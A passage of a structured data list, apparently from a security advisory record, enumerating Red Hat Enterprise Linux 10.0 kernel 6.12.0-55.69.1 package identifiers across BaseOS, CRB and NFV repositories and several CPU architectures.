"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
